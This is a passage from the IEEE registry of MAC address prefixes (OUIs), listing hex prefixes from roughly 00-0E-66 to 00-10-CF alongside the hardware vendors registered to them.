Hitachi Advanced Digital, Inc. 00-0E-67 (hex) Eltis Microelectronics Ltd. 00-0E-68 (hex) E-TOP Network Technology Inc. 00-0E-69 (hex) China Electric Power Research Institute 00-0E-6A (hex) 3Com Ltd 00-0E-6B (hex) Janitza electronics GmbH 00-0E-6C (hex) Device Drivers Limited 00-0E-6D (hex) Murata Manufacturing Co., Ltd. 00-0E-6E (hex) MICRELEC ELECTRONICS S.A 00-0E-6F (hex) IRIS Corporation Berhad 00-0E-70 (hex) in2 Networks 00-0E-71 (hex) Gemstar Technology Development Ltd. 00-0E-72 (hex) CTS electronics 00-0E-73 (hex) Tpack A/S 00-0E-74 (hex) Solar Telecom. Tech 00-0E-75 (hex) New York Air Brake Corp. 00-0E-76 (hex) GEMSOC INNOVISION INC. 00-0E-77 (hex) Decru, Inc. 00-0E-78 (hex) Amtelco 00-0E-79 (hex) Ample Communications Inc. 00-0E-7A (hex) GemWon Communications Co., Ltd. 00-0E-7B (hex) Toshiba 00-0E-7C (hex) Televes S.A. 00-0E-7D (hex) Electronics Line 3000 Ltd. 00-0E-7E (hex) ionSign Oy 00-0E-7F (hex) Hewlett-Packard Company 00-0E-80 (hex) Thomson Technology Inc 00-0E-81 (hex) Devicescape Software, Inc. 00-0E-82 (hex) Commtech Wireless 00-0E-83 (hex) Cisco Systems 00-0E-84 (hex) Cisco Systems 00-0E-85 (hex) Catalyst Enterprises, Inc. 00-0E-86 (hex) Alcatel North America 00-0E-87 (hex) adp Gauselmann GmbH 00-0E-88 (hex) VIDEOTRON CORP. 00-0E-89 (hex) CLEMATIC 00-0E-8A (hex) Avara Technologies Pty. Ltd. 00-0E-8B (hex) Astarte Technology Co, Ltd. 00-0E-8C (hex) Siemens AG A&D ET 00-0E-8D (hex) Systems in Progress Holding GmbH 00-0E-8E (hex) SparkLAN Communications, Inc. 00-0E-8F (hex) Sercomm Corp. 00-0E-90 (hex) PONICO CORP. 00-0E-91 (hex) Navico Auckland Ltd 00-0E-92 (hex) Millinet Co., Ltd. 00-0E-93 (hex) Milénio 3 Sistemas Electrónicos, Lda. 00-0E-94 (hex) Maas International BV 00-0E-95 (hex) Fujiya Denki Seisakusho Co.,Ltd. 00-0E-96 (hex) Cubic Defense Applications, Inc. 00-0E-97 (hex) Ultracker Technology CO., Inc 00-0E-98 (hex) HME Clear-Com LTD. 00-0E-99 (hex) Spectrum Digital, Inc 00-0E-9A (hex) BOE TECHNOLOGY GROUP CO.,LTD 00-0E-9B (hex) Ambit Microsystems Corporation 00-0E-9C (hex) Pemstar 00-0E-9D (hex) Tiscali UK Ltd 00-0E-9E (hex) Topfield Co., Ltd 00-0E-9F (hex) TEMIC SDS GmbH 00-0E-A0 (hex) NetKlass Technology Inc. 00-0E-A1 (hex) Formosa Teletek Corporation 00-0E-A2 (hex) McAfee, Inc 00-0E-A3 (hex) CNCR-IT CO.,LTD,HangZhou P.R.CHINA 00-0E-A4 (hex) Certance Inc. 00-0E-A5 (hex) BLIP Systems 00-0E-A6 (hex) ASUSTEK COMPUTER INC. 00-0E-A7 (hex) Endace Technology 00-0E-A8 (hex) United Technologists Europe Limited 00-0E-A9 (hex) Shanghai Xun Shi Communications Equipment Ltd. Co. 00-0E-AA (hex) Scalent Systems, Inc. 00-0E-AB (hex) Cray Inc 00-0E-AC (hex) MINTRON ENTERPRISE CO., LTD. 00-0E-AD (hex) Metanoia Technologies, Inc. 00-0E-AE (hex) GAWELL TECHNOLOGIES CORP. 00-0E-AF (hex) CASTEL 00-0E-B0 (hex) Solutions Radio BV 00-0E-B1 (hex) Newcotech,Ltd 00-0E-B2 (hex) Micro-Research Finland Oy 00-0E-B3 (hex) Hewlett-Packard 00-0E-B4 (hex) GUANGZHOU GAOKE COMMUNICATIONS TECHNOLOGY CO.LTD. 00-0E-B5 (hex) Ecastle Electronics Co., Ltd. 00-0E-B6 (hex) Riverbed Technology, Inc. 00-0E-B7 (hex) Knovative, Inc. 00-0E-B8 (hex) Iiga co.,Ltd 00-0E-B9 (hex) HASHIMOTO Electronics Industry Co.,Ltd. 00-0E-BA (hex) HANMI SEMICONDUCTOR CO., LTD. 00-0E-BB (hex) Everbee Networks 00-0E-BC (hex) Paragon Fidelity GmbH 00-0E-BD (hex) Burdick, a Quinton Compny 00-0E-BE (hex) B&B Electronics Manufacturing Co. 00-0E-BF (hex) Remsdaq Limited 00-0E-C0 (hex) Nortel Networks 00-0E-C1 (hex) MYNAH Technologies 00-0E-C2 (hex) Lowrance Electronics, Inc. 00-0E-C3 (hex) Logic Controls, Inc. 00-0E-C4 (hex) Iskra Transmission d.d. 00-0E-C5 (hex) Digital Multitools Inc 00-0E-C6 (hex) ASIX ELECTRONICS CORP. 00-0E-C7 (hex) Motorola Korea 00-0E-C8 (hex) Zoran Corporation 00-0E-C9 (hex) YOKO Technology Corp. 00-0E-CA (hex) WTSS Inc 00-0E-CB (hex) VineSys Technology 00-0E-CC (hex) Tableau, LLC 00-0E-CD (hex) SKOV A/S 00-0E-CE (hex) S.I.T.T.I. S.p.A. 00-0E-CF (hex) PROFIBUS Nutzerorganisation e.V. 00-0E-D0 (hex) Privaris, Inc. 00-0E-D1 (hex) Osaka Micro Computer. 00-0E-D2 (hex) Filtronic plc 00-0E-D3 (hex) Epicenter, Inc. 00-0E-D4 (hex) CRESITT INDUSTRIE 00-0E-D5 (hex) COPAN Systems Inc. 00-0E-D6 (hex) Cisco Systems 00-0E-D7 (hex) Cisco Systems 00-0E-D8 (hex) Aktino, Inc. 00-0E-D9 (hex) Aksys, Ltd. 00-0E-DA (hex) C-TECH UNITED CORP. 00-0E-DB (hex) XiNCOM Corp. 00-0E-DC (hex) Tellion INC. 00-0E-DD (hex) SHURE INCORPORATED 00-0E-DE (hex) REMEC, Inc. 00-0E-DF (hex) PLX Technology 00-0E-E0 (hex) Mcharge 00-0E-E1 (hex) ExtremeSpeed Inc. 00-0E-E2 (hex) Custom Engineering S.p.A. 00-0E-E3 (hex) Chiyu Technology Co.,Ltd 00-0E-E4 (hex) BOE TECHNOLOGY GROUP CO.,LTD 00-0E-E5 (hex) bitWallet, Inc. 00-0E-E6 (hex) Adimos Systems LTD 00-0E-E7 (hex) AAC ELECTRONICS CORP. 00-0E-E8 (hex) zioncom 00-0E-E9 (hex) WayTech Development, Inc. 00-0E-EA (hex) Shadong Luneng Jicheng Electronics,Co.,Ltd 00-0E-EB (hex) Sandmartin(zhong shan)Electronics Co.,Ltd 00-0E-EC (hex) Orban 00-0E-ED (hex) Nokia Danmark A/S 00-0E-EE (hex) Muco Industrie BV 00-0E-EF (hex) PRIVATE 00-0E-F0 (hex) Festo AG & Co. KG 00-0E-F1 (hex) EZQUEST INC. 00-0E-F2 (hex) Infinico Corporation 00-0E-F3 (hex) Smarthome 00-0E-F4 (hex) Kasda Digital Technology Co.,Ltd 00-0E-F5 (hex) iPAC Technology Co., Ltd. 00-0E-F6 (hex) E-TEN Information Systems Co., Ltd. 00-0E-F7 (hex) Vulcan Portals Inc 00-0E-F8 (hex) SBC ASI 00-0E-F9 (hex) REA Elektronik GmbH 00-0E-FA (hex) Optoway Technology Incorporation 00-0E-FB (hex) Macey Enterprises 00-0E-FC (hex) JTAG Technologies B.V. 00-0E-FD (hex) FUJINON CORPORATION 00-0E-FE (hex) EndRun Technologies LLC 00-0E-FF (hex) Megasolution,Inc. 00-0F-00 (hex) Legra Systems, Inc. 00-0F-01 (hex) DIGITALKS INC 00-0F-02 (hex) Digicube Technology Co., Ltd 00-0F-03 (hex) COM&C CO., LTD 00-0F-04 (hex) cim-usa inc 00-0F-05 (hex) 3B SYSTEM INC. 00-0F-06 (hex) Nortel Networks 00-0F-07 (hex) Mangrove Systems, Inc. 00-0F-08 (hex) Indagon Oy 00-0F-09 (hex) PRIVATE 00-0F-0A (hex) Clear Edge Networks 00-0F-0B (hex) Kentima Technologies AB 00-0F-0C (hex) SYNCHRONIC ENGINEERING 00-0F-0D (hex) Hunt Electronic Co., Ltd. 00-0F-0E (hex) WaveSplitter Technologies, Inc. 00-0F-0F (hex) Real ID Technology Co., Ltd. 00-0F-10 (hex) RDM Corporation 00-0F-11 (hex) Prodrive B.V. 00-0F-12 (hex) Panasonic Europe Ltd. 00-0F-13 (hex) Nisca corporation 00-0F-14 (hex) Mindray Co., Ltd. 00-0F-15 (hex) Kjaerulff1 A/S 00-0F-16 (hex) JAY HOW TECHNOLOGY CO., 00-0F-17 (hex) Insta Elektro GmbH 00-0F-18 (hex) Industrial Control Systems 00-0F-19 (hex) Boston Scientific 00-0F-1A (hex) Gaming Support B.V. 00-0F-1B (hex) Ego Systems Inc. 00-0F-1C (hex) DigitAll World Co., Ltd 00-0F-1D (hex) Cosmo Techs Co., Ltd. 00-0F-1E (hex) Chengdu KT Electric Co.of High & New Technology 00-0F-1F (hex) WW PCBA Test 00-0F-20 (hex) Hewlett-Packard Company 00-0F-21 (hex) Scientific Atlanta, Inc 00-0F-22 (hex) Helius, Inc. 00-0F-23 (hex) Cisco Systems 00-0F-24 (hex) Cisco Systems 00-0F-25 (hex) AimValley B.V. 00-0F-26 (hex) WorldAccxx LLC 00-0F-27 (hex) TEAL Electronics, Inc. 00-0F-28 (hex) Itronix Corporation 00-0F-29 (hex) Augmentix Corporation 00-0F-2A (hex) Cableware Electronics 00-0F-2B (hex) GREENBELL SYSTEMS 00-0F-2C (hex) Uplogix, Inc. 00-0F-2D (hex) CHUNG-HSIN ELECTRIC & MACHINERY MFG.CORP. 00-0F-2E (hex) Megapower International Corp. 00-0F-2F (hex) W-LINX TECHNOLOGY CO., LTD. 00-0F-30 (hex) Raza Microelectronics Inc 00-0F-31 (hex) Allied Vision Technologies Canada Inc 00-0F-32 (hex) LuTong Electronic Technology Co.,Ltd 00-0F-33 (hex) DUALi Inc. 00-0F-34 (hex) Cisco Systems 00-0F-35 (hex) Cisco Systems 00-0F-36 (hex) Accurate Techhnologies, Inc. 00-0F-37 (hex) Xambala Incorporated 00-0F-38 (hex) Netstar 00-0F-39 (hex) IRIS SENSORS 00-0F-3A (hex) HISHARP 00-0F-3B (hex) Fuji System Machines Co., Ltd. 00-0F-3C (hex) Endeleo Limited 00-0F-3D (hex) D-Link Corporation 00-0F-3E (hex) CardioNet, Inc 00-0F-3F (hex) Big Bear Networks 00-0F-40 (hex) Optical Internetworking Forum 00-0F-41 (hex) Zipher Ltd 00-0F-42 (hex) Xalyo Systems 00-0F-43 (hex) Wasabi Systems Inc. 00-0F-44 (hex) Tivella Inc. 00-0F-45 (hex) Stretch, Inc. 00-0F-46 (hex) SINAR AG 00-0F-47 (hex) ROBOX SPA 00-0F-48 (hex) Polypix Inc. 00-0F-49 (hex) Northover Solutions Limited 00-0F-4A (hex) Kyushu-kyohan co.,ltd 00-0F-4B (hex) Oracle Corporation 00-0F-4C (hex) Elextech INC 00-0F-4D (hex) TalkSwitch 00-0F-4E (hex) Cellink 00-0F-4F (hex) Cadmus Technology Ltd 00-0F-50 (hex) StreamScale Limited 00-0F-51 (hex) Azul Systems, Inc. 00-0F-52 (hex) YORK Refrigeration, Marine & Controls 00-0F-53 (hex) Solarflare Communications Inc 00-0F-54 (hex) Entrelogic Corporation 00-0F-55 (hex) Datawire Communication Networks Inc. 00-0F-56 (hex) Continuum Photonics Inc 00-0F-57 (hex) CABLELOGIC Co., Ltd. 00-0F-58 (hex) Adder Technology Limited 00-0F-59 (hex) Phonak Communications AG 00-0F-5A (hex) Peribit Networks 00-0F-5B (hex) Delta Information Systems, Inc. 00-0F-5C (hex) Day One Digital Media Limited 00-0F-5D (hex) PacketFront International AB 00-0F-5E (hex) Veo 00-0F-5F (hex) Nicety Technologies Inc. (NTS) 00-0F-60 (hex) Lifetron Co.,Ltd 00-0F-61 (hex) Hewlett-Packard Company 00-0F-62 (hex) Alcatel Bell Space N.V. 00-0F-63 (hex) Obzerv Technologies 00-0F-64 (hex) D&R Electronica Weesp BV 00-0F-65 (hex) icube Corp. 00-0F-66 (hex) Cisco-Linksys 00-0F-67 (hex) West Instruments 00-0F-68 (hex) Vavic Network Technology, Inc. 00-0F-69 (hex) SEW Eurodrive GmbH & Co. KG 00-0F-6A (hex) Nortel Networks 00-0F-6B (hex) GateWare Communications GmbH 00-0F-6C (hex) ADDI-DATA GmbH 00-0F-6D (hex) Midas Engineering 00-0F-6E (hex) BBox 00-0F-6F (hex) FTA Communication Technologies 00-0F-70 (hex) Wintec Industries, inc. 00-0F-71 (hex) Sanmei Electronics Co.,Ltd 00-0F-72 (hex) Sandburst 00-0F-73 (hex) RS Automation Co., Ltd 00-0F-74 (hex) Qamcom Technology AB 00-0F-75 (hex) First Silicon Solutions 00-0F-76 (hex) Digital Keystone, Inc. 00-0F-77 (hex) DENTUM CO.,LTD 00-0F-78 (hex) Datacap Systems Inc 00-0F-79 (hex) Bluetooth Interest Group Inc. 00-0F-7A (hex) BeiJing NuQX Technology CO.,LTD 00-0F-7B (hex) Arce Sistemas, S.A. 00-0F-7C (hex) ACTi Corporation 00-0F-7D (hex) Xirrus 00-0F-7E (hex) Ablerex Electronics Co., LTD 00-0F-7F (hex) UBSTORAGE Co.,Ltd. 00-0F-80 (hex) Trinity Security Systems,Inc. 00-0F-81 (hex) Secure Info Imaging 00-0F-82 (hex) Mortara Instrument, Inc. 00-0F-83 (hex) Brainium Technologies Inc. 00-0F-84 (hex) Astute Networks, Inc. 00-0F-85 (hex) ADDO-Japan Corporation 00-0F-86 (hex) Research In Motion Limited 00-0F-87 (hex) Maxcess International 00-0F-88 (hex) AMETEK, Inc. 00-0F-89 (hex) Winnertec System Co., Ltd. 00-0F-8A (hex) WideView 00-0F-8B (hex) Orion MultiSystems Inc 00-0F-8C (hex) Gigawavetech Pte Ltd 00-0F-8D (hex) FAST TV-Server AG 00-0F-8E (hex) DONGYANG TELECOM CO.,LTD. 00-0F-8F (hex) Cisco Systems 00-0F-90 (hex) Cisco Systems 00-0F-91 (hex) Aerotelecom Co.,Ltd. 00-0F-92 (hex) Microhard Systems Inc. 00-0F-93 (hex) Landis+Gyr Ltd. 00-0F-94 (hex) Genexis 00-0F-95 (hex) ELECOM Co.,LTD Laneed Division 00-0F-96 (hex) Telco Systems, Inc. 00-0F-97 (hex) Avanex Corporation 00-0F-98 (hex) Avamax Co. Ltd. 00-0F-99 (hex) APAC opto Electronics Inc. 00-0F-9A (hex) Synchrony, Inc. 00-0F-9B (hex) Ross Video Limited 00-0F-9C (hex) Panduit Corp 00-0F-9D (hex) DisplayLink (UK) Ltd 00-0F-9E (hex) Murrelektronik GmbH 00-0F-9F (hex) Motorola Mobility, Inc. 00-0F-A0 (hex) CANON KOREA BUSINESS SOLUTIONS INC. 00-0F-A1 (hex) Gigabit Systems Inc. 00-0F-A2 (hex) Digital Path Networks 00-0F-A3 (hex) Alpha Networks Inc. 00-0F-A4 (hex) Sprecher Automation GmbH 00-0F-A5 (hex) BWA Technology GmbH 00-0F-A6 (hex) S2 Security Corporation 00-0F-A7 (hex) Raptor Networks Technology 00-0F-A8 (hex) Photometrics, Inc. 00-0F-A9 (hex) PC Fabrik 00-0F-AA (hex) Nexus Technologies 00-0F-AB (hex) Kyushu Electronics Systems Inc. 00-0F-AC (hex) IEEE 802.11 00-0F-AD (hex) FMN communications GmbH 00-0F-AE (hex) E2O Communications 00-0F-AF (hex) Dialog Inc. 00-0F-B0 (hex) Compal Electronics,INC. 00-0F-B1 (hex) Cognio Inc. 00-0F-B2 (hex) Broadband Pacenet (India) Pvt. Ltd. 00-0F-B3 (hex) Actiontec Electronics, Inc 00-0F-B4 (hex) Timespace Technology 00-0F-B5 (hex) NETGEAR Inc 00-0F-B6 (hex) Europlex Technologies 00-0F-B7 (hex) Cavium Networks 00-0F-B8 (hex) CallURL Inc. 00-0F-B9 (hex) Adaptive Instruments 00-0F-BA (hex) Tevebox AB 00-0F-BB (hex) Nokia Siemens Networks GmbH & Co. KG 00-0F-BC (hex) Onkey Technologies, Inc. 00-0F-BD (hex) MRV Communications (Networks) LTD 00-0F-BE (hex) e-w/you Inc. 00-0F-BF (hex) DGT Sp. z o.o. 00-0F-C0 (hex) DELCOMp 00-0F-C1 (hex) WAVE Corporation 00-0F-C2 (hex) Uniwell Corporation 00-0F-C3 (hex) PalmPalm Technology, Inc. 00-0F-C4 (hex) NST co.,LTD. 00-0F-C5 (hex) KeyMed Ltd 00-0F-C6 (hex) Eurocom Industries A/S 00-0F-C7 (hex) Dionica R&D Ltd. 00-0F-C8 (hex) Chantry Networks 00-0F-C9 (hex) Allnet GmbH 00-0F-CA (hex) A-JIN TECHLINE CO, LTD 00-0F-CB (hex) 3Com Ltd 00-0F-CC (hex) Netopia, Inc. 00-0F-CD (hex) Nortel Networks 00-0F-CE (hex) Kikusui Electronics Corp. 00-0F-CF (hex) Datawind Research 00-0F-D0 (hex) ASTRI 00-0F-D1 (hex) Applied Wireless Identifications Group, Inc. 00-0F-D2 (hex) EWA Technologies, Inc. 00-0F-D3 (hex) Digium 00-0F-D4 (hex) Soundcraft 00-0F-D5 (hex) Schwechat - RISE 00-0F-D6 (hex) Sarotech Co., Ltd 00-0F-D7 (hex) Harman Music Group 00-0F-D8 (hex) Force, Inc. 00-0F-D9 (hex) FlexDSL Telecommunications AG 00-0F-DA (hex) YAZAKI CORPORATION 00-0F-DB (hex) Westell Technologies 00-0F-DC (hex) Ueda Japan Radio Co., Ltd. 00-0F-DD (hex) SORDIN AB 00-0F-DE (hex) Sony Ericsson Mobile Communications AB 00-0F-DF (hex) SOLOMON Technology Corp. 00-0F-E0 (hex) NComputing Co.,Ltd. 00-0F-E1 (hex) ID DIGITAL CORPORATION 00-0F-E2 (hex) Hangzhou H3C Technologies Co., Ltd. 00-0F-E3 (hex) Damm Cellular Systems A/S 00-0F-E4 (hex) Pantech Co.,Ltd 00-0F-E5 (hex) MERCURY SECURITY CORPORATION 00-0F-E6 (hex) MBTech Systems, Inc. 00-0F-E7 (hex) Lutron Electronics Co., Inc. 00-0F-E8 (hex) Lobos, Inc. 00-0F-E9 (hex) GW TECHNOLOGIES CO.,LTD. 00-0F-EA (hex) Giga-Byte Technology Co.,LTD. 00-0F-EB (hex) Cylon Controls 00-0F-EC (hex) Arkus Inc. 00-0F-ED (hex) Anam Electronics Co., Ltd 00-0F-EE (hex) XTec, Incorporated 00-0F-EF (hex) Thales e-Transactions GmbH 00-0F-F0 (hex) Sunray Co. Ltd. 00-0F-F1 (hex) nex-G Systems Pte.Ltd 00-0F-F2 (hex) Loud Technologies Inc. 00-0F-F3 (hex) Jung Myoung Communications&Technology 00-0F-F4 (hex) Guntermann & Drunck GmbH 00-0F-F5 (hex) GN&S company 00-0F-F6 (hex) Darfon Electronics Corp. 00-0F-F7 (hex) Cisco Systems 00-0F-F8 (hex) Cisco Systems 00-0F-F9 (hex) Valcretec, Inc. 00-0F-FA (hex) Optinel Systems, Inc. 00-0F-FB (hex) Nippon Denso Industry Co., Ltd. 00-0F-FC (hex) Merit Li-Lin Ent. 00-0F-FD (hex) Glorytek Network Inc. 00-0F-FE (hex) G-PRO COMPUTER 00-0F-FF (hex) Control4 00-10-00 (hex) CABLE TELEVISION LABORATORIES, INC. 00-10-01 (hex) Citel 00-10-02 (hex) ACTIA 00-10-03 (hex) IMATRON, INC. 00-10-04 (hex) THE BRANTLEY COILE COMPANY,INC 00-10-05 (hex) UEC COMMERCIAL 00-10-06 (hex) Thales Contact Solutions Ltd. 00-10-07 (hex) CISCO SYSTEMS, INC. 00-10-08 (hex) VIENNA SYSTEMS CORPORATION 00-10-09 (hex) HORO QUARTZ 00-10-0A (hex) WILLIAMS COMMUNICATIONS GROUP 00-10-0B (hex) CISCO SYSTEMS, INC. 00-10-0C (hex) ITO CO., LTD. 00-10-0D (hex) CISCO SYSTEMS, INC. 00-10-0E (hex) MICRO LINEAR COPORATION 00-10-0F (hex) INDUSTRIAL CPU SYSTEMS 00-10-10 (hex) INITIO CORPORATION 00-10-11 (hex) CISCO SYSTEMS, INC. 00-10-12 (hex) PROCESSOR SYSTEMS (I) PVT LTD 00-10-13 (hex) Kontron America, Inc. 00-10-14 (hex) CISCO SYSTEMS, INC. 00-10-15 (hex) OOmon Inc. 00-10-16 (hex) T.SQWARE 00-10-17 (hex) Bosch Access Systems GmbH 00-10-18 (hex) BROADCOM CORPORATION 00-10-19 (hex) SIRONA DENTAL SYSTEMS GmbH & Co. KG 00-10-1A (hex) PictureTel Corp. 00-10-1B (hex) CORNET TECHNOLOGY, INC. 00-10-1C (hex) OHM TECHNOLOGIES INTL, LLC 00-10-1D (hex) WINBOND ELECTRONICS CORP. 00-10-1E (hex) MATSUSHITA ELECTRONIC INSTRUMENTS CORP. 00-10-1F (hex) CISCO SYSTEMS, INC. 00-10-20 (hex) Hand Held Products Inc 00-10-21 (hex) ENCANTO NETWORKS, INC. 00-10-22 (hex) SatCom Media Corporation 00-10-23 (hex) Network Equipment Technologies 00-10-24 (hex) NAGOYA ELECTRIC WORKS CO., LTD 00-10-25 (hex) Grayhill, Inc 00-10-26 (hex) ACCELERATED NETWORKS, INC. 00-10-27 (hex) L-3 COMMUNICATIONS EAST 00-10-28 (hex) COMPUTER TECHNICA, INC. 00-10-29 (hex) CISCO SYSTEMS, INC. 00-10-2A (hex) ZF MICROSYSTEMS, INC. 00-10-2B (hex) UMAX DATA SYSTEMS, INC. 00-10-2C (hex) Lasat Networks A/S 00-10-2D (hex) HITACHI SOFTWARE ENGINEERING 00-10-2E (hex) NETWORK SYSTEMS & TECHNOLOGIES PVT. LTD. 00-10-2F (hex) CISCO SYSTEMS, INC. 00-10-30 (hex) EION Inc. 00-10-31 (hex) OBJECTIVE COMMUNICATIONS, INC. 00-10-32 (hex) ALTA TECHNOLOGY 00-10-33 (hex) ACCESSLAN COMMUNICATIONS, INC. 00-10-34 (hex) GNP Computers 00-10-35 (hex) ELITEGROUP COMPUTER SYSTEMS CO., LTD 00-10-36 (hex) INTER-TEL INTEGRATED SYSTEMS 00-10-37 (hex) CYQ've Technology Co., Ltd. 00-10-38 (hex) MICRO RESEARCH INSTITUTE, INC. 00-10-39 (hex) Vectron Systems AG 00-10-3A (hex) DIAMOND NETWORK TECH 00-10-3B (hex) HIPPI NETWORKING FORUM 00-10-3C (hex) IC ENSEMBLE, INC. 00-10-3D (hex) PHASECOM, LTD. 00-10-3E (hex) NETSCHOOLS CORPORATION 00-10-3F (hex) TOLLGRADE COMMUNICATIONS, INC. 00-10-40 (hex) INTERMEC CORPORATION 00-10-41 (hex) BRISTOL BABCOCK, INC. 00-10-42 (hex) Alacritech, Inc. 00-10-43 (hex) A2 CORPORATION 00-10-44 (hex) InnoLabs Corporation 00-10-45 (hex) Nortel Networks 00-10-46 (hex) ALCORN MCBRIDE INC. 00-10-47 (hex) ECHO ELETRIC CO. LTD. 00-10-48 (hex) HTRC AUTOMATION, INC. 00-10-49 (hex) ShoreTel, Inc 00-10-4A (hex) The Parvus Corporation 00-10-4B (hex) 3COM CORPORATION 00-10-4C (hex) LeCroy Corporation 00-10-4D (hex) SURTEC INDUSTRIES, INC. 00-10-4E (hex) CEOLOGIC 00-10-4F (hex) Oracle Corporation 00-10-50 (hex) RION CO., LTD. 00-10-51 (hex) CMICRO CORPORATION 00-10-52 (hex) METTLER-TOLEDO (ALBSTADT) GMBH 00-10-53 (hex) COMPUTER TECHNOLOGY CORP. 00-10-54 (hex) CISCO SYSTEMS, INC. 00-10-55 (hex) FUJITSU MICROELECTRONICS, INC. 00-10-56 (hex) SODICK CO., LTD. 00-10-57 (hex) Rebel.com, Inc. 00-10-58 (hex) ArrowPoint Communications 00-10-59 (hex) DIABLO RESEARCH CO. LLC 00-10-5A (hex) 3COM CORPORATION 00-10-5B (hex) NET INSIGHT AB 00-10-5C (hex) QUANTUM DESIGNS (H.K.) LTD. 00-10-5D (hex) Draeger Medical 00-10-5E (hex) HEKIMIAN LABORATORIES, INC. 00-10-5F (hex) ZODIAC DATA SYSTEMS 00-10-60 (hex) BILLIONTON SYSTEMS, INC. 00-10-61 (hex) HOSTLINK CORP. 00-10-62 (hex) NX SERVER, ILNC. 00-10-63 (hex) STARGUIDE DIGITAL NETWORKS 00-10-64 (hex) DNPG, LLC 00-10-65 (hex) RADYNE CORPORATION 00-10-66 (hex) ADVANCED CONTROL SYSTEMS, INC. 00-10-67 (hex) Ericsson 00-10-68 (hex) COMOS TELECOM 00-10-69 (hex) HELIOSS COMMUNICATIONS, INC. 00-10-6A (hex) DIGITAL MICROWAVE CORPORATION 00-10-6B (hex) SONUS NETWORKS, INC. 00-10-6C (hex) Infratec AG 00-10-6D (hex) Axxcelera Broadband Wireless 00-10-6E (hex) TADIRAN COM. LTD. 00-10-6F (hex) TRENTON TECHNOLOGY INC. 00-10-70 (hex) CARADON TREND LTD. 00-10-71 (hex) ADVANET INC. 00-10-72 (hex) GVN TECHNOLOGIES, INC. 00-10-73 (hex) Technobox, Inc. 00-10-74 (hex) ATEN INTERNATIONAL CO., LTD. 00-10-75 (hex) Maxtor Corporation 00-10-76 (hex) EUREM GmbH 00-10-77 (hex) SAF DRIVE SYSTEMS, LTD. 00-10-78 (hex) NUERA COMMUNICATIONS, INC. 00-10-79 (hex) CISCO SYSTEMS, INC. 00-10-7A (hex) AmbiCom, Inc. 00-10-7B (hex) CISCO SYSTEMS, INC. 00-10-7C (hex) P-COM, INC. 00-10-7D (hex) AURORA COMMUNICATIONS, LTD. 00-10-7E (hex) BACHMANN ELECTRONIC GmbH 00-10-7F (hex) CRESTRON ELECTRONICS, INC. 00-10-80 (hex) METAWAVE COMMUNICATIONS 00-10-81 (hex) DPS, INC. 00-10-82 (hex) JNA TELECOMMUNICATIONS LIMITED 00-10-83 (hex) HEWLETT-PACKARD COMPANY 00-10-84 (hex) K-BOT COMMUNICATIONS 00-10-85 (hex) POLARIS COMMUNICATIONS, INC. 00-10-86 (hex) ATTO Technology, Inc. 00-10-87 (hex) Xstreamis PLC 00-10-88 (hex) AMERICAN NETWORKS INC. 00-10-89 (hex) WebSonic 00-10-8A (hex) TeraLogic, Inc. 00-10-8B (hex) LASERANIMATION SOLLINGER GmbH 00-10-8C (hex) FUJITSU TELECOMMUNICATIONS EUROPE, LTD. 00-10-8D (hex) Johnson Controls, Inc. 00-10-8E (hex) HUGH SYMONS CONCEPT Technologies Ltd. 00-10-8F (hex) RAPTOR SYSTEMS 00-10-90 (hex) CIMETRICS, INC. 00-10-91 (hex) NO WIRES NEEDED BV 00-10-92 (hex) NETCORE INC. 00-10-93 (hex) CMS COMPUTERS, LTD. 00-10-94 (hex) Performance Analysis Broadband, Spirent plc 00-10-95 (hex) Thomson Inc. 00-10-96 (hex) TRACEWELL SYSTEMS, INC. 00-10-97 (hex) WinNet Metropolitan Communications Systems, Inc. 00-10-98 (hex) STARNET TECHNOLOGIES, INC. 00-10-99 (hex) InnoMedia, Inc. 00-10-9A (hex) NETLINE 00-10-9B (hex) Emulex Corporation 00-10-9C (hex) M-SYSTEM CO., LTD. 00-10-9D (hex) CLARINET SYSTEMS, INC. 00-10-9E (hex) AWARE, INC. 00-10-9F (hex) PAVO, INC. 00-10-A0 (hex) INNOVEX TECHNOLOGIES, INC. 00-10-A1 (hex) KENDIN SEMICONDUCTOR, INC. 00-10-A2 (hex) TNS 00-10-A3 (hex) OMNITRONIX, INC. 00-10-A4 (hex) XIRCOM 00-10-A5 (hex) OXFORD INSTRUMENTS 00-10-A6 (hex) CISCO SYSTEMS, INC. 00-10-A7 (hex) UNEX TECHNOLOGY CORPORATION 00-10-A8 (hex) RELIANCE COMPUTER CORP. 00-10-A9 (hex) ADHOC TECHNOLOGIES 00-10-AA (hex) MEDIA4, INC. 00-10-AB (hex) KOITO ELECTRIC INDUSTRIES, LTD. 00-10-AC (hex) IMCI TECHNOLOGIES 00-10-AD (hex) SOFTRONICS USB, INC. 00-10-AE (hex) SHINKO ELECTRIC INDUSTRIES CO. 00-10-AF (hex) TAC SYSTEMS, INC. 00-10-B0 (hex) MERIDIAN TECHNOLOGY CORP. 00-10-B1 (hex) FOR-A CO., LTD. 00-10-B2 (hex) COACTIVE AESTHETICS 00-10-B3 (hex) NOKIA MULTIMEDIA TERMINALS 00-10-B4 (hex) ATMOSPHERE NETWORKS 00-10-B5 (hex) ACCTON TECHNOLOGY CORPORATION 00-10-B6 (hex) ENTRATA COMMUNICATIONS CORP. 00-10-B7 (hex) COYOTE TECHNOLOGIES, LLC 00-10-B8 (hex) ISHIGAKI COMPUTER SYSTEM CO. 00-10-B9 (hex) MAXTOR CORP. 00-10-BA (hex) MARTINHO-DAVIS SYSTEMS, INC. 00-10-BB (hex) DATA & INFORMATION TECHNOLOGY 00-10-BC (hex) Aastra Telecom 00-10-BD (hex) THE TELECOMMUNICATION TECHNOLOGY COMMITTEE (TTC) 00-10-BE (hex) MARCH NETWORKS CORPORATION 00-10-BF (hex) InterAir Wireless 00-10-C0 (hex) ARMA, Inc. 00-10-C1 (hex) OI ELECTRIC CO., LTD. 00-10-C2 (hex) WILLNET, INC. 00-10-C3 (hex) CSI-CONTROL SYSTEMS 00-10-C4 (hex) MEDIA LINKS CO., LTD. 00-10-C5 (hex) PROTOCOL TECHNOLOGIES, INC. 00-10-C6 (hex) Universal Global Scientific Industrial Co., Ltd. 00-10-C7 (hex) DATA TRANSMISSION NETWORK 00-10-C8 (hex) COMMUNICATIONS ELECTRONICS SECURITY GROUP 00-10-C9 (hex) MITSUBISHI ELECTRONICS LOGISTIC SUPPORT CO. 00-10-CA (hex) Telco Systems, Inc. 00-10-CB (hex) FACIT K.K. 00-10-CC (hex) CLP COMPUTER LOGISTIK PLANUNG GmbH 00-10-CD (hex) INTERFACE CONCEPT 00-10-CE (hex) VOLAMP, LTD. 00-10-CF (hex) FIBERLANE COMMUNICATIONS 